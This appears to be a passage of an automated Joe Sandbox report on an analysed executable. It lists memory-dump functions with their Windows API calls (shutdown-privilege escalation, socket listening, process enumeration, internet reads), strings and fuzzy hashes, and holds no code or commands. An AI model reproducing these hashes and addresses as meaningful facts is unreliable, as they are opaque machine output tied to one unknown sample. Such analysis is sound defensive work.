Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
String ID:
API String ID: 830902736-0
Opcode ID: f49fa516cd598059d2b9a5d93199b95f4fa4353815b93237441162cf8c547e9b
Instruction ID: 0fb0edd1413edb78b988a260b49571a3fedf58ed69104872edfd507b44da69d3
Opcode Fuzzy Hash: f49fa516cd598059d2b9a5d93199b95f4fa4353815b93237441162cf8c547e9b
Instruction Fuzzy Hash: 8CB17B75600225EFDF25CF68C9857AE7BB1FF48702F088069ED48DB296D734A958CB50

Function 007E58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007E5A05
_memmove.LIBCMT ref: 007E5A55
_memmove.LIBCMT ref: 007E5ABB

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d88014008a8e7263386f3d94fb39c4509e390ad707305ac2703513a36899ce68
Instruction ID: b336ca2fca5ba246783f7dada2e7031caa9e530811bfe921c94ba66a54defc25
Opcode Fuzzy Hash: d88014008a8e7263386f3d94fb39c4509e390ad707305ac2703513a36899ce68
Instruction Fuzzy Hash: 63128970A0061DDFDF14DFA5D985AAEB7B5FF48304F108229E406E7292EB3AAD51CB50

Function 007E5680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 007F0FF6: std::exception::exception.LIBCMT ref: 007F102C
Part of subcall function 007F0FF6: __CxxThrowException@8.LIBCMT ref: 007F1041

_memmove.LIBCMT ref: 0082062F
_memmove.LIBCMT ref: 00820744
_memmove.LIBCMT ref: 008207EB

Strings

yZ~, xrefs: 00820881, 008207FF

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID: yZ~
API String ID: 1300846289-1401447208
Opcode ID: 8efee45ee48ebee2d79e23ced143fdafad8e79b28e271255a25b63c725d9a8f0
Instruction ID: 3998c1d6064850215da7945e7c0f0ca948a61a985cf7df2d0ed84fbb1ea34518
Opcode Fuzzy Hash: 8efee45ee48ebee2d79e23ced143fdafad8e79b28e271255a25b63c725d9a8f0
Instruction Fuzzy Hash: 54029FB0A00219DFCF04DF69E985AAE7BB5FF48304F148069E806DB356EB35D950CB91

Function 0085C27C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

Part of subcall function 007D2344: GetCursorPos.USER32(?), ref: 007D2357
Part of subcall function 007D2344: ScreenToClient.USER32(008967B0,?), ref: 007D2374
Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000001), ref: 007D2399
Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000002), ref: 007D23A7

ReleaseCapture.USER32 ref: 0085C2F0
SetWindowTextW.USER32(?,00000000), ref: 0085C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0085C3AD
NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 0085C48F

Strings

@GUI_DROPID, xrefs: 0085C3E1
@GUI_DRAGFILE, xrefs: 0085C424

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 973565025-2107944366
Opcode ID: e6b4b7f4c0932653149dbf93582f5f473ceee5f57a2890f4795468045557fabd
Instruction ID: cbc27a616150337427f2a77acb1dbd19549a4bbe3fa5bf8b971c5ea28f4a7faf
Opcode Fuzzy Hash: e6b4b7f4c0932653149dbf93582f5f473ceee5f57a2890f4795468045557fabd
Instruction Fuzzy Hash: AA519E70204304EFDB04EF24C859F6A7BF5FB88311F04852AF991972E2DB74A959CB52

Function 0083545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00828CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00828D0D
Part of subcall function 00828CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828D3A
Part of subcall function 00828CC3: GetLastError.KERNEL32 ref: 00828D47

ExitWindowsEx.USER32(?,00000000), ref: 0083549B

Strings

@, xrefs: 0083548E
SeShutdownPrivilege, xrefs: 0083546B
, xrefs: 00835489

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 1d88f3c8cc0be7140ab8c414a4ee330ee64da5a7330474e8c93ef03ba72ca01f
Instruction ID: 0146fb459d0ac05815daccb8a0c7c888699e9a3eb1b43b7d0079e82945a7efe4
Opcode Fuzzy Hash: 1d88f3c8cc0be7140ab8c414a4ee330ee64da5a7330474e8c93ef03ba72ca01f
Instruction Fuzzy Hash: 5101F7B1655B156AEB2C6678EC4ABBA7298FB84353F240131FD07D20D3EA955C8082D9

Function 007E3190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

Oa~, xrefs: 007E3482

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __itow__swprintf
String ID: Oa~
API String ID: 674341424-1339823410
Opcode ID: e2bd0833ea893e4a879af039e2072a935fba8e6053d4705c020bba7d9da96d8c
Instruction ID: 5f0cfd22773c2256501d60ef48f1c0f02639516cbcc2c07ef84e56426c963bfa
Opcode Fuzzy Hash: e2bd0833ea893e4a879af039e2072a935fba8e6053d4705c020bba7d9da96d8c
Instruction Fuzzy Hash: 1E2279715083819FC724DF25C885BAAB7E8FF88314F10492DF59697391DB78EA44CB92

Function 00846596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 008465EF
WSAGetLastError.WS2_32(00000000), ref: 008465FE
bind.WS2_32(00000000,?,00000010), ref: 0084661A
listen.WS2_32(00000000,00000005), ref: 00846629
WSAGetLastError.WS2_32(00000000), ref: 00846643
closesocket.WS2_32(00000000), ref: 00846657

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 86d3baa1da3446d241b269229a49437c818e5e22983502e5ef32e950ee0ce8e6
Instruction ID: a919202654f409cb6889dcd821bf8609770a63882dea29ca0025ce353ded037f
Opcode Fuzzy Hash: 86d3baa1da3446d241b269229a49437c818e5e22983502e5ef32e950ee0ce8e6
Instruction Fuzzy Hash: A621C3312002189FCB00AF24D849B6EB7B9FF49311F15816AEA56E73D2DB34AD10CB51

Function 007D1287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 007D19FA
GetSysColor.USER32(0000000F), ref: 007D1A4E
SetBkColor.GDI32(?,00000000), ref: 007D1A61

Part of subcall function 007D1290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 007D12D8

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ColorDialogNtdllProc_$LongWindow
String ID:
API String ID: 591255283-0
Opcode ID: 9e5ae42ad12c0344cab17585a7135860fe64bed20c1e3c4b5d7e5bca573bd675
Instruction ID: 78b844b2ae9e575c0474097ef60c6e12c43e9c4c31b3bf58d8d4bf2c128ca5b1
Opcode Fuzzy Hash: 9e5ae42ad12c0344cab17585a7135860fe64bed20c1e3c4b5d7e5bca573bd675
Instruction Fuzzy Hash: A2A159B1105594BEE628AB784C58D7F36BDFB82352B94411BF402E63D6DE1CDD01D2B2

Function 00846A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008480A0: inet_addr.WS2_32(00000000), ref: 008480CB

socket.WS2_32(00000002,00000002,00000011), ref: 00846AB1
WSAGetLastError.WS2_32(00000000), ref: 00846ADA
bind.WS2_32(00000000,?,00000010), ref: 00846B13
WSAGetLastError.WS2_32(00000000), ref: 00846B20
closesocket.WS2_32(00000000), ref: 00846B34

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 6678c6d5e6ae3365e04547dd96823aef6f0a6553041b37fb3b12d97852f17ef2
Instruction ID: aeb0a1dbe0930aec7438a29af5d6e8e3f97602499d46f4b2cc66a0c4b5e23b90
Opcode Fuzzy Hash: 6678c6d5e6ae3365e04547dd96823aef6f0a6553041b37fb3b12d97852f17ef2
Instruction Fuzzy Hash: 1A419675600614EFEB10BF24DC8AF6E77B9EB45714F048059FA16AB3D2DA785D008792

Function 008555FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0085564C
IsWindowEnabled.USER32 ref: 0085565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00855667
IsIconic.USER32 ref: 00855675
IsZoomed.USER32 ref: 00855683

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: fe69739e1dd484256991e73052eedc1210544c01de48949c14a1b3d266902087
Instruction ID: dca10e6695ce9f2d0d91a674fd4707b73dd99e2645a98e189412309b68b85a82
Opcode Fuzzy Hash: fe69739e1dd484256991e73052eedc1210544c01de48949c14a1b3d266902087
Instruction Fuzzy Hash: ED11C8313006619FD7111F26DC68B6F77E9FF64723B814029FD06D7241DB349905CA95

Function 0084F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0084F151
Process32FirstW.KERNEL32(00000000,?), ref: 0084F15F

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Process32NextW.KERNEL32(00000000,?), ref: 0084F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0084F22E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 6d9d32470fe3c899754fd00f7b5f54878af236dfd846d93a822e69642fad270c
Instruction ID: 8d297bd49111e62e49854af22b0440afc798d995b978cd5215df4a240b03d60c
Opcode Fuzzy Hash: 6d9d32470fe3c899754fd00f7b5f54878af236dfd846d93a822e69642fad270c
Instruction Fuzzy Hash: AE516B71504711AFD310EF24DC85A6BBBF8FF94710F10492EF595972A2EB74A908CB92

Function 0085C788 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

GetCursorPos.USER32(?), ref: 0085C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0080BBFB,?,?,?,?,?), ref: 0085C7D7
GetCursorPos.USER32(?), ref: 0085C824
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0080BBFB,?,?,?), ref: 0085C85E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: f4492181859df72fee4e8eefec51f5ab9ec6077ac3212ca41be89420a653bd2f
Instruction ID: da6f150db1c219a227a27a67947bec8f7382b7541af29dcf9bd3ebadea5b5fbe
Opcode Fuzzy Hash: f4492181859df72fee4e8eefec51f5ab9ec6077ac3212ca41be89420a653bd2f
Instruction Fuzzy Hash: A731A039600218AFCB15DF58C898EEA7BB6FB49312F0440A9FD05CB262D7359D65DFA0

Function 008340B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008340D1
_memset.LIBCMT ref: 008340F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00834144
CloseHandle.KERNEL32(00000000), ref: 0083414D

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 7ef4eea3b0b6d1d22f82c91fb2bcba7492b460f404c37e3ff375de6d50a282c4
Instruction ID: ba57dd1827bd4741215c370898decf4898dd751f27f41b0b5a831db6eb18f0de
Opcode Fuzzy Hash: 7ef4eea3b0b6d1d22f82c91fb2bcba7492b460f404c37e3ff375de6d50a282c4
Instruction Fuzzy Hash: 1111AB7590132C7AD7305BA59C4DFABBB7CEF85760F104196F908D7190D6745E808BA4

Function 007D1290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 007D12D8
GetClientRect.USER32(?,?), ref: 0080B84B
GetCursorPos.USER32(?), ref: 0080B855
ScreenToClient.USER32(?,?), ref: 0080B860

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
String ID:
API String ID: 1010295502-0
Opcode ID: fbd2e6e3ec307971396dc49b73fef7f5516f4f229bdb9215b9157f81246e9b28
Instruction ID: dde1ab276059bb75e1fd835c07d3d33c1de547948f05fdcced7b919a4d4db575
Opcode Fuzzy Hash: fbd2e6e3ec307971396dc49b73fef7f5516f4f229bdb9215b9157f81246e9b28
Instruction Fuzzy Hash: D7115536A00119FBCB00EFA8D8899AE77B9FB05301F404466FA01E3251D739BA55CBA5

Function 0082EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0082EB19

Strings

|, xrefs: 0082EB49
(, xrefs: 0082EB5F

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 30d6c5f8e86850b191e6a0d70601078cd8a47cca29631396667a9a2d845536ac
Instruction ID: df05799495331153c1c98b763e7cd67a0a0e22b22e4c783d8376cdc82dd9a1f2
Opcode Fuzzy Hash: 30d6c5f8e86850b191e6a0d70601078cd8a47cca29631396667a9a2d845536ac
Instruction Fuzzy Hash: 61324775A00615DFCB28CF19D48096AB7F0FF48320B15C56EE99ADB3A2DB70E981CB44

Function 008425E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 008426D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0084270C

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: f297513b033e2ba5aec6f9657823a6ea9e4ba73383674aa6f5fc5a6abb4a2ca3
Instruction ID: cbd02319dd2283d24cf587eac4706d06497bba52021211b4f12ef9ac01aa7e25
Opcode Fuzzy Hash: f297513b033e2ba5aec6f9657823a6ea9e4ba73383674aa6f5fc5a6abb4a2ca3
